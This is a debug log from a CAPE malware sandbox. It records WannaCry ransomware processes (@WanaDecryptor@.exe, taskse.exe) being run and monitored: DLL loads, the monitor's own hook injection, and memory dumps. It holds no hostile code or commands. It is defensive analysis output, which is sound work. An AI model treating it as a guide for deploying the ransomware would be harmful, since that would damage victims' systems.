2025-12-08 09:09:52,078 [root] DEBUG: 2600: DLL loaded at 0x71600000: C:\Windows\System32\msxml3 (0x134000 bytes).
2025-12-08 09:09:52,093 [root] DEBUG: 2600: DLL loaded at 0x75150000: C:\Windows\syswow64\urlmon (0x14f000 bytes).
2025-12-08 09:09:52,093 [root] DEBUG: 2600: DLL loaded at 0x765D0000: C:\Windows\syswow64\api-ms-win-downlevel-ole32-l1-1-0 (0x4000 bytes).
2025-12-08 09:09:52,093 [root] DEBUG: 2600: DLL loaded at 0x76070000: C:\Windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0 (0x4000 bytes).
2025-12-08 09:09:52,093 [root] DEBUG: 2600: DLL loaded at 0x752A0000: C:\Windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0 (0x5000 bytes).
2025-12-08 09:09:52,093 [root] DEBUG: 2600: DLL loaded at 0x764F0000: C:\Windows\syswow64\api-ms-win-downlevel-user32-l1-1-0 (0x4000 bytes).
2025-12-08 09:09:52,093 [root] DEBUG: 2600: DLL loaded at 0x76060000: C:\Windows\syswow64\api-ms-win-downlevel-version-l1-1-0 (0x4000 bytes).
2025-12-08 09:09:52,093 [root] DEBUG: 2600: DLL loaded at 0x739F0000: C:\Windows\system32\version (0x9000 bytes).
2025-12-08 09:09:52,093 [root] DEBUG: 2600: DLL loaded at 0x765C0000: C:\Windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0 (0x3000 bytes).
2025-12-08 09:09:52,093 [root] DEBUG: 2600: DLL loaded at 0x75140000: C:\Windows\syswow64\normaliz (0x3000 bytes).
2025-12-08 09:09:52,093 [root] DEBUG: 2600: DLL loaded at 0x761E0000: C:\Windows\syswow64\iertutil (0x238000 bytes).
2025-12-08 09:09:52,109 [root] DEBUG: 2600: DLL loaded at 0x752B0000: C:\Windows\syswow64\WININET (0x437000 bytes).
2025-12-08 09:09:52,109 [root] DEBUG: 2600: DLL loaded at 0x75120000: C:\Windows\syswow64\USERENV (0x19000 bytes).
2025-12-08 09:09:52,109 [root] DEBUG: 2600: DLL loaded at 0x75AC0000: C:\Windows\syswow64\profapi (0xb000 bytes).
2025-12-08 09:09:52,109 [root] DEBUG: 2600: DLL loaded at 0x74AC0000: C:\Windows\system32\uxtheme (0x80000 bytes).
2025-12-08 09:09:52,109 [root] DEBUG: 2600: DLL loaded at 0x739A0000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0 (0x4000 bytes).
2025-12-08 09:09:52,109 [root] DEBUG: 2600: api-rate-cap: memcpy hook disabled due to rate
2025-12-08 09:09:52,109 [root] DEBUG: 2600: DLL loaded at 0x73140000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2025-12-08 09:09:52,109 [root] DEBUG: 2600: DLL loaded at 0x73100000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2025-12-08 09:09:52,109 [root] DEBUG: 2600: DLL loaded at 0x73410000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2025-12-08 09:09:52,125 [root] DEBUG: 900: DLL loaded at 0x000007FEF68B0000: C:\Windows\system32\wbem\wbemsvc (0x13000 bytes).
2025-12-08 09:09:52,125 [root] DEBUG: 2600: DLL loaded at 0x71940000: C:\Windows\system32\wbem\wbemsvc (0xf000 bytes).
2025-12-08 09:09:52,140 [root] DEBUG: 2600: DLL loaded at 0x71550000: C:\Windows\system32\wbem\fastprox (0xa6000 bytes).
2025-12-08 09:09:52,140 [root] DEBUG: 2600: DLL loaded at 0x71530000: C:\Windows\system32\NTDSAPI (0x18000 bytes).
2025-12-08 09:09:52,140 [root] DEBUG: 900: api-rate-cap: memcpy hook disabled due to rate
2025-12-08 09:09:52,187 [root] DEBUG: 556: CreateProcessHandler: Injection info set for new process 1792: C:\Windows\sysWOW64\wbem\wmiprvse.exe, ImageBase: 0x00000000010C0000
2025-12-08 09:09:52,187 [root] INFO: Announced 32-bit process name: WmiPrvSE.exe pid: 1792
2025-12-08 09:09:52,187 [lib.api.process] INFO: Monitor config for <Process 1792 WmiPrvSE.exe>: C:\tmp2azv04x4\dll\1792.ini
2025-12-08 09:09:52,187 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:09:52,203 [root] DEBUG: Loader: Injecting process 1792 (thread 2312) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:52,203 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 09:09:52,203 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:52,203 [lib.api.process] INFO: Injected into 32-bit <Process 1792 WmiPrvSE.exe>
2025-12-08 09:09:52,203 [root] INFO: Announced 32-bit process name: WmiPrvSE.exe pid: 1792
2025-12-08 09:09:52,203 [lib.api.process] INFO: Monitor config for <Process 1792 WmiPrvSE.exe>: C:\tmp2azv04x4\dll\1792.ini
2025-12-08 09:09:52,203 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:09:52,218 [root] DEBUG: Loader: Injecting process 1792 (thread 2312) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:52,218 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 09:09:52,218 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:52,218 [lib.api.process] INFO: Injected into 32-bit <Process 1792 WmiPrvSE.exe>
2025-12-08 09:09:52,218 [root] DEBUG: 1792: Python path set to 'C:\Python38'.
2025-12-08 09:09:52,234 [root] DEBUG: 1792: Dropped file limit defaulting to 100.
2025-12-08 09:09:52,234 [root] INFO: Disabling sleep skipping.
2025-12-08 09:09:52,234 [root] DEBUG: 1792: Services hook set enabled
2025-12-08 09:09:52,234 [root] DEBUG: 1792: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:09:52,234 [root] DEBUG: 1792: Monitor initialised: 32-bit capemon loaded in process 1792 at 0x74260000, thread 2312, image base 0x10c0000, stack from 0x160000-0x170000
2025-12-08 09:09:52,234 [root] DEBUG: 1792: Commandline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
2025-12-08 09:09:52,234 [root] DEBUG: 1792: hook_api: Warning - CreateRemoteThreadEx export address 0x7744A337 differs from GetProcAddress -> 0x75A8403A (KERNELBASE.dll::0x1403a)
2025-12-08 09:09:52,234 [root] DEBUG: 1792: Hooked 69 out of 69 functions
2025-12-08 09:09:52,234 [root] DEBUG: 1792: WoW64 detected: 64-bit ntdll base: 0x77760000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x777cb510, Wow64PrepareForException: 0x0
2025-12-08 09:09:52,234 [root] DEBUG: 1792: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x180000
2025-12-08 09:09:52,234 [root] INFO: Loaded monitor into process with pid 1792
2025-12-08 09:09:52,249 [root] DEBUG: 1792: DLL loaded at 0x745C0000: C:\Windows\system32\ntmarta (0x21000 bytes).
2025-12-08 09:09:52,249 [root] DEBUG: 1792: DLL loaded at 0x765E0000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2025-12-08 09:09:52,249 [root] DEBUG: 1792: DLL loaded at 0x756F0000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2025-12-08 09:09:52,249 [root] DEBUG: 1792: DLL loaded at 0x71950000: C:\Windows\system32\wbem\wbemprox (0xb000 bytes).
2025-12-08 09:09:52,249 [root] DEBUG: 1792: DLL loaded at 0x73140000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2025-12-08 09:09:52,249 [root] DEBUG: 1792: DLL loaded at 0x73100000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2025-12-08 09:09:52,249 [root] DEBUG: 1792: DLL loaded at 0x73410000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2025-12-08 09:09:52,265 [root] DEBUG: 1792: DLL loaded at 0x71940000: C:\Windows\system32\wbem\wbemsvc (0xf000 bytes).
2025-12-08 09:09:52,265 [root] DEBUG: 900: OpenProcessHandler: Injection info created for process 1792, handle 0x47c: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
2025-12-08 09:09:52,281 [root] DEBUG: 1792: DLL loaded at 0x71510000: C:\Windows\system32\wbem\wmiutils (0x1a000 bytes).
2025-12-08 09:09:52,296 [root] DEBUG: 1792: DLL loaded at 0x714F0000: C:\Windows\system32\wbem\vsswmi (0x20000 bytes).
2025-12-08 09:09:52,296 [root] DEBUG: 1792: DLL loaded at 0x717B0000: C:\Windows\system32\framedynos (0x35000 bytes).
2025-12-08 09:09:52,296 [root] DEBUG: 1792: DLL loaded at 0x713D0000: C:\Windows\system32\VSSAPI (0x116000 bytes).
2025-12-08 09:09:52,296 [root] DEBUG: 1792: DLL loaded at 0x713B0000: C:\Windows\system32\ATL (0x14000 bytes).
2025-12-08 09:09:52,296 [root] DEBUG: 1792: DLL loaded at 0x713A0000: C:\Windows\system32\VssTrace (0x10000 bytes).
2025-12-08 09:09:52,328 [root] DEBUG: 2600: DLL loaded at 0x71510000: C:\Windows\system32\wbem\wmiutils (0x1a000 bytes).
2025-12-08 09:09:52,343 [root] DEBUG: 2600: NtTerminateProcess hook: Attempting to dump process 2600
2025-12-08 09:09:52,343 [root] DEBUG: 2600: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 09:09:52,343 [root] INFO: Process with pid 2600 has terminated
2025-12-08 09:09:52,359 [root] DEBUG: 2460: NtTerminateProcess hook: Attempting to dump process 2460
2025-12-08 09:09:52,359 [root] DEBUG: 2460: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 09:09:52,359 [root] INFO: Process with pid 2460 has terminated
2025-12-08 09:10:02,406 [root] DEBUG: 2540: NtTerminateProcess hook: Attempting to dump process 2540
2025-12-08 09:10:02,406 [root] DEBUG: 2540: VerifyCodeSection: Executable code does not match, 0x4e0 of 0x174a46 matching
2025-12-08 09:10:02,406 [root] DEBUG: 2540: DoProcessDump: Code modification detected, dumping Imagebase at 0x00000000FFD90000.
2025-12-08 09:10:02,406 [root] DEBUG: 2540: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2025-12-08 09:10:02,421 [root] DEBUG: 2540: DumpProcess: Instantiating PeParser with address: 0x00000000FFD90000.
2025-12-08 09:10:02,421 [root] DEBUG: 2540: DumpProcess: Module entry point VA is 0x0000000000130DC0.
2025-12-08 09:10:02,421 [lib.common.results] INFO: Uploading file C:\fJCIHnd\CAPE\2540_6893875323681122025 to procdump\48550d24ccfa035dfb536695418dc7e00e50d03a1164c89d7058b95edf1411e6; Size is 1600512; Max size: 100000000
2025-12-08 09:10:02,437 [root] DEBUG: 2540: DumpProcess: Module image dump success - dump size 0x186c00.
2025-12-08 09:10:02,437 [root] INFO: Process with pid 2540 has terminated
2025-12-08 09:10:10,203 [root] DEBUG: 3040: CreateProcessHandler: Injection info set for new process 1336: C:\Users\user\AppData\Local\Temp\taskse.exe, ImageBase: 0x00400000
2025-12-08 09:10:10,203 [root] INFO: Announced 32-bit process name: taskse.exe pid: 1336
2025-12-08 09:10:10,203 [lib.api.process] INFO: Monitor config for <Process 1336 taskse.exe>: C:\tmp2azv04x4\dll\1336.ini
2025-12-08 09:10:10,203 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:10:10,218 [root] DEBUG: Loader: Injecting process 1336 (thread 1820) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:10:10,218 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 09:10:10,218 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:10:10,218 [lib.api.process] INFO: Injected into 32-bit <Process 1336 taskse.exe>
2025-12-08 09:10:10,218 [root] INFO: Announced 32-bit process name: taskse.exe pid: 1336
2025-12-08 09:10:10,218 [lib.api.process] INFO: Monitor config for <Process 1336 taskse.exe>: C:\tmp2azv04x4\dll\1336.ini
2025-12-08 09:10:10,218 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:10:10,234 [root] DEBUG: Loader: Injecting process 1336 (thread 1820) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:10:10,234 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 09:10:10,234 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:10:10,234 [lib.api.process] INFO: Injected into 32-bit <Process 1336 taskse.exe>
2025-12-08 09:10:10,234 [root] DEBUG: 3040: CreateProcessHandler: Injection info set for new process 2844: C:\Users\user\AppData\Local\Temp\@WanaDecryptor@.exe, ImageBase: 0x00400000
2025-12-08 09:10:10,249 [root] DEBUG: 1336: Python path set to 'C:\Python38'.
2025-12-08 09:10:10,249 [root] DEBUG: 1336: Dropped file limit defaulting to 100.
2025-12-08 09:10:10,249 [root] INFO: Announced 32-bit process name: @WanaDecryptor@.exe pid: 2844
2025-12-08 09:10:10,249 [lib.api.process] INFO: Monitor config for <Process 2844 @WanaDecryptor@.exe>: C:\tmp2azv04x4\dll\2844.ini
2025-12-08 09:10:10,249 [root] INFO: Disabling sleep skipping.
2025-12-08 09:10:10,249 [root] DEBUG: 1336: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:10:10,249 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:10:10,249 [root] DEBUG: 1336: YaraScan: Scanning 0x00400000, size 0x5000
2025-12-08 09:10:10,249 [root] DEBUG: 1336: Monitor initialised: 32-bit capemon loaded in process 1336 at 0x74260000, thread 1820, image base 0x400000, stack from 0x186000-0x190000
2025-12-08 09:10:10,249 [root] DEBUG: 1336: Commandline: taskse.exe C:\Users\user\AppData\Local\Temp\@WanaDecryptor@.exe
2025-12-08 09:10:10,265 [root] DEBUG: 1336: GetAddressByYara: ModuleBase 0x77920000 FunctionName LdrpCallInitRoutine
2025-12-08 09:10:10,265 [root] DEBUG: 1336: hook_api: Warning - CreateRemoteThreadEx export address 0x7744A337 differs from GetProcAddress -> 0x75A8403A (KERNELBASE.dll::0x1403a)
2025-12-08 09:10:10,265 [root] DEBUG: Loader: Injecting process 2844 (thread 1456) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:10:10,265 [root] DEBUG: 1336: hook_api: Warning - UpdateProcThreadAttribute export address 0x7744ABB7 differs from GetProcAddress -> 0x75A7FA26 (KERNELBASE.dll::0xfa26)
2025-12-08 09:10:10,265 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 09:10:10,265 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 09:10:10,265 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:10:10,265 [lib.api.process] INFO: Injected into 32-bit <Process 2844 @WanaDecryptor@.exe>
2025-12-08 09:10:10,281 [root] DEBUG: 1336: set_hooks: Unable to hook GetCommandLineA
2025-12-08 09:10:10,281 [root] INFO: Announced 32-bit process name: @WanaDecryptor@.exe pid: 2844
2025-12-08 09:10:10,281 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 09:10:10,281 [root] DEBUG: 1336: set_hooks: Unable to hook GetCommandLineW
2025-12-08 09:10:10,281 [root] DEBUG: 1336: Hooked 611 out of 613 functions
2025-12-08 09:10:10,281 [lib.api.process] INFO: Monitor config for <Process 2844 @WanaDecryptor@.exe>: C:\tmp2azv04x4\dll\2844.ini
2025-12-08 09:10:10,281 [root] DEBUG: 1336: WoW64 detected: 64-bit ntdll base: 0x77760000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x777cb510, Wow64PrepareForException: 0x0
2025-12-08 09:10:10,281 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:10:10,281 [root] DEBUG: 1336: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x3b0000
2025-12-08 09:10:10,296 [root] INFO: Loaded monitor into process with pid 1336
2025-12-08 09:10:10,296 [root] DEBUG: 1336: caller_dispatch: Added region at 0x00400000 to tracked regions list (ntdll::memcpy returns to 0x00401607, thread 1820).
2025-12-08 09:10:10,296 [root] DEBUG: Loader: Injecting process 2844 (thread 1456) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:10:10,296 [root] DEBUG: 1336: caller_dispatch: Scanning calling region at 0x00400000...
2025-12-08 09:10:10,296 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 09:10:10,296 [root] DEBUG: 1336: YaraScan: Scanning 0x00400000, size 0x5000
2025-12-08 09:10:10,296 [root] DEBUG: 1336: ProcessImageBase: Main module image at 0x00400000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:10:10,296 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:10:10,296 [root] DEBUG: 1336: DLL loaded at 0x71730000: C:\Windows\system32\Wtsapi32 (0xd000 bytes).
2025-12-08 09:10:10,296 [lib.api.process] INFO: Injected into 32-bit <Process 2844 @WanaDecryptor@.exe>
2025-12-08 09:10:10,296 [root] DEBUG: 1336: DLL loaded at 0x71700000: C:\Windows\system32\WINSTA (0x29000 bytes).
2025-12-08 09:10:10,312 [root] DEBUG: 1336: DLL loaded at 0x75120000: C:\Windows\syswow64\userenv (0x19000 bytes).
2025-12-08 09:10:10,312 [root] DEBUG: 1336: DLL loaded at 0x75AC0000: C:\Windows\syswow64\profapi (0xb000 bytes).
2025-12-08 09:10:10,312 [root] DEBUG: 2844: Python path set to 'C:\Python38'.
2025-12-08 09:10:10,312 [root] DEBUG: 2844: Dropped file limit defaulting to 100.
2025-12-08 09:10:10,312 [root] INFO: Disabling sleep skipping.
2025-12-08 09:10:10,312 [root] DEBUG: 2844: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:10:10,312 [root] DEBUG: 2844: YaraScan: Scanning 0x00400000, size 0x3d000
2025-12-08 09:10:10,328 [root] DEBUG: 2844: Monitor initialised: 32-bit capemon loaded in process 2844 at 0x74260000, thread 1456, image base 0x400000, stack from 0x186000-0x190000
2025-12-08 09:10:10,328 [root] DEBUG: 2844: Commandline: @WanaDecryptor@.exe
2025-12-08 09:10:10,328 [root] DEBUG: 2844: GetAddressByYara: ModuleBase 0x77920000 FunctionName LdrpCallInitRoutine
2025-12-08 09:10:10,328 [root] DEBUG: 2844: hook_api: Warning - CreateRemoteThreadEx export address 0x7744A337 differs from GetProcAddress -> 0x75A8403A (KERNELBASE.dll::0x1403a)
2025-12-08 09:10:10,328 [root] DEBUG: 2844: hook_api: Warning - UpdateProcThreadAttribute export address 0x7744ABB7 differs from GetProcAddress -> 0x75A7FA26 (KERNELBASE.dll::0xfa26)
2025-12-08 09:10:10,328 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 09:10:10,328 [root] DEBUG: 2844: set_hooks: Unable to hook GetCommandLineA
2025-12-08 09:10:10,328 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 09:10:10,328 [root] DEBUG: 2844: set_hooks: Unable to hook GetCommandLineW
2025-12-08 09:10:10,343 [root] DEBUG: 2844: Hooked 611 out of 613 functions
2025-12-08 09:10:10,343 [root] DEBUG: 2844: WoW64 detected: 64-bit ntdll base: 0x77760000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x777cb510, Wow64PrepareForException: 0x0
2025-12-08 09:10:10,343 [root] DEBUG: 2844: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x240000
2025-12-08 09:10:10,343 [root] INFO: Loaded monitor into process with pid 2844
2025-12-08 09:10:10,343 [root] DEBUG: 2844: DLL loaded at 0x71E10000: C:\Windows\system32\odbcint (0x38000 bytes).
2025-12-08 09:10:10,343 [root] DEBUG: 2844: caller_dispatch: Added region at 0x00400000 to tracked regions list (ntdll::memcpy returns to 0x004131BD, thread 1456).
2025-12-08 09:10:10,343 [root] DEBUG: 2844: caller_dispatch: Scanning calling region at 0x00400000...
2025-12-08 09:10:10,343 [root] DEBUG: 2844: YaraScan: Scanning 0x00400000, size 0x3d000
2025-12-08 09:10:10,343 [root] DEBUG: 2844: ProcessImageBase: Main module image at 0x00400000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:10:10,343 [root] DEBUG: 2844: NtTerminateProcess hook: Attempting to dump process 2844
2025-12-08 09:10:10,343 [root] DEBUG: 2844: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 09:10:10,343 [root] INFO: Process with pid 2844 has terminated
2025-12-08 09:10:10,531 [root] DEBUG: 1336: NtTerminateProcess hook: Attempting to dump process 1336
2025-12-08 09:10:10,531 [root] DEBUG: 1336: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 09:10:10,531 [root] INFO: Process with pid 1336 has terminated
2025-12-08 09:10:11,406 [root] DEBUG: 1212: CreateProcessHandler: Injection info set for new process 2020: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe, ImageBase: 0x000000013F0D0000
2025-12-08 09:10:11,406 [root] INFO: Announced 64-bit process name: OfficeClickToRun.exe pid: 2020
2025-12-08 09:10:11,421 [lib.api.process] INFO: Monitor config for <Process 2020 OfficeClickToRun.exe>: C:\tmp2azv04x4\dll\2020.ini
2025-12-08 09:10:11,421 [lib.api.process] INFO: 64-bit DLL to inject is C:\tmp2azv04x4\dll\YZitKGI.dll, loader C:\tmp2azv04x4\bin\kTlnsNzT.exe
2025-12-08 09:10:11,421 [root] DEBUG: Loader: Injecting process 2020 (thread 584) with C:\tmp2azv04x4\dll\YZitKGI.dll.
2025-12-08 09:10:11,421 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 09:10:11,421 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\YZitKGI.dll.
2025-12-08 09:10:11,421 [lib.api.process] INFO: Injected into 64-bit <Process 2020 OfficeClickToRun.exe>
2025-12-08 09:10:11,421 [root] INFO: Announced 64-bit process name: OfficeClickToRun.exe pid: 2020
2025-12-08 09:10:11,421 [lib.api.process] INFO: Monitor config for <Process 2020 OfficeClickToRun.exe>: C:\tmp2azv04x4\dll\2020.ini
2025-12-08 09:10:11,421 [lib.api.process] INFO: 64-bit DLL to inject is C:\tmp2azv04x4\dll\YZitKGI.dll, loader C:\tmp2azv04x4\bin\kTlnsNzT.exe
2025-12-08 09:10:11,437 [root] DEBUG: Loader: Injecting process 2020 (thread 584) with C:\tmp2azv04x4\dll\YZitKGI.dll.
2025-12-08 09:10:11,437 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 09:10:11,437 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\YZitKGI.dll.
2025-12-08 09:10:11,437 [lib.api.process] INFO: Injected into 64-bit <Process 2020 OfficeClickToRun.exe>
2025-12-08 09:10:11,437 [root] DEBUG: 1212: DLL loaded at 0x0000000073CB0000: C:\Windows\system32\sfc (0x3000 bytes).
2025-12-08 09:10:11,453 [root] DEBUG: 1212: DLL loaded at 0x000007FEF84B0000: C:\Windows\system32\sfc_os (0x10000 bytes).
2025-12-08 09:10:11,453 [root] DEBUG: 1212: DLL loaded at 0x000007FEFC580000: C:\Windows\system32\DEVRTL (0x12000 bytes).
2025-12-08 09:10:11,500 [root] DEBUG: 2020: Python path set to 'C:\Python38'.
2025-12-08 09:10:11,500 [root] DEBUG: 2020: Dropped file limit defaulting to 100.
2025-12-08 09:10:11,515 [root] INFO: Disabling sleep skipping.
2025-12-08 09:10:11,515 [root] DEBUG: 2020: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:10:11,515 [root] DEBUG: 2020: YaraScan: Scanning 0x000000013F0D0000, size 0x798410
2025-12-08 09:10:11,546 [root] DEBUG: 2020: Monitor initialised: 64-bit capemon loaded in process 2020 at 0x000007FEF30B0000, thread 584, image base 0x000000013F0D0000, stack from 0x0000000000126000-0x0000000000130000
2025-12-08 09:10:11,546 [root] DEBUG: 2020: Commandline: "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /user
2025-12-08 09:10:11,562 [root] DEBUG: 2020: GetAddressByYara: ModuleBase 0x0000000077760000 FunctionName LdrpCallInitRoutine
2025-12-08 09:10:11,578 [root] WARNING: b'Unable to place hook on LockResource'
2025-12-08 09:10:11,578 [root] DEBUG: 2020: set_hooks: Unable to hook LockResource
2025-12-08 09:10:11,578 [root] DEBUG: 2020: Hooked 605 out of 606 functions
2025-12-08 09:10:11,578 [root] INFO: Loaded monitor into process with pid 2020
2025-12-08 09:10:11,578 [root] DEBUG: 2020: caller_dispatch: Added region at 0x000007FEF9480000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x000007FEF94A98FE, thread 584).
2025-12-08 09:10:11,578 [root] DEBUG: 2020: ProcessTrackedRegion: Region at 0x000007FEF9480000 mapped as \Device\HarddiskVolume2\Program Files\Common Files\Microsoft Shared\ClickToRun\ucrtbase.dll, skipping
2025-12-08 09:10:11,578 [root] DEBUG: 2020: caller_dispatch: Added region at 0x000007FEF9580000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x000007FEF958CCB6, thread 584).
2025-12-08 09:10:11,578 [root] DEBUG: 2020: ProcessTrackedRegion: Region at 0x000007FEF9580000 mapped as \Device\HarddiskVolume2\Program Files\Common Files\Microsoft Shared\ClickToRun\vcruntime140.dll, skipping
2025-12-08 09:10:11,578 [root] DEBUG: 2020: caller_dispatch: Added region at 0x000007FEF9220000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x000007FEF926C122, thread 584).
2025-12-08 09:10:11,578 [root] DEBUG: 2020: ProcessTrackedRegion: Region at 0x000007FEF9220000 mapped as \Device\HarddiskVolume2\Program Files\Common Files\Microsoft Shared\ClickToRun\msvcp140.dll, skipping
2025-12-08 09:10:11,578 [root] DEBUG: 2020: caller_dispatch: Added region at 0x000007FEF90E0000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x000007FEF90E9CA2, thread 584).
2025-12-08 09:10:11,593 [root] DEBUG: 2020: ProcessTrackedRegion: Region at 0x000007FEF90E0000 mapped as \Device\HarddiskVolume2\Program Files\Common Files\Microsoft Shared\ClickToRun\ApiClient.dll, skipping
2025-12-08 09:10:11,593 [root] DEBUG: 2020: caller_dispatch: Added region at 0x000000013F0D0000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x000000013F49AB30, thread 584).
2025-12-08 09:10:11,593 [root] DEBUG: 2020: YaraScan: Scanning 0x000000013F0D0000, size 0x798410
2025-12-08 09:10:11,625 [root] DEBUG: 2020: ProcessImageBase: Main module image at 0x000000013F0D0000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:10:11,640 [root] DEBUG: 2020: DLL loaded at 0x000007FEFD110000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2025-12-08 09:10:11,640 [root] DEBUG: 2020: DLL loaded at 0x000007FEF8DC0000: C:\Windows\system32\msi (0x31e000 bytes).
2025-12-08 09:10:11,640 [root] DEBUG: 2020: DLL loaded at 0x000007FEFECB0000: C:\Windows\system32\SHELL32 (0xd8b000 bytes).
2025-12-08 09:10:11,687 [root] DEBUG: 2020: DLL loaded at 0x000007FEFC390000: C:\Windows\system32\VERSION (0xc000 bytes).
2025-12-08 09:10:11,703 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\USERDUM-8A61A1P-20251208-1350.log
2025-12-08 09:10:11,703 [root] DEBUG: 2020: DLL loaded at 0x000007FEFD2B0000: C:\Windows\system32\profapi (0xf000 bytes).
2025-12-08 09:10:11,703 [root] DEBUG: 2020: DLL loaded at 0x000007FEFCEC0000: C:\Windows\system32\Secur32 (0xb000 bytes).
2025-12-08 09:10:11,703 [root] DEBUG: 2020: DLL loaded at 0x000007FEFBCD0000: C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_e372d88f30fbb845\Comctl32 (0x1f5000 bytes).
2025-12-08 09:10:11,718 [root] DEBUG: 2020: DLL loaded at 0x000007FEFB9F0000: C:\Windows\system32\uxtheme (0x56000 bytes).
2025-12-08 09:10:11,718 [root] DEBUG: 2020: DLL loaded at 0x000007FEFE7F0000: C:\Windows\system32\CLBCatQ (0x99000 bytes).
2025-12-08 09:10:11,718 [root] DEBUG: 2020: DLL loaded at 0x000007FEFD200000: C:\Windows\system32\RpcRtRemote (0x14000 bytes).
2025-12-08 09:10:11,734 [root] DEBUG: 2020: DLL loaded at 0x000007FEF7FF0000: C:\Windows\System32\netprofm (0x74000 bytes).
2025-12-08 09:10:11,734 [root] DEBUG: 2020: DLL loaded at 0x000007FEF7FD0000: C:\Windows\System32\nlaapi (0x15000 bytes).
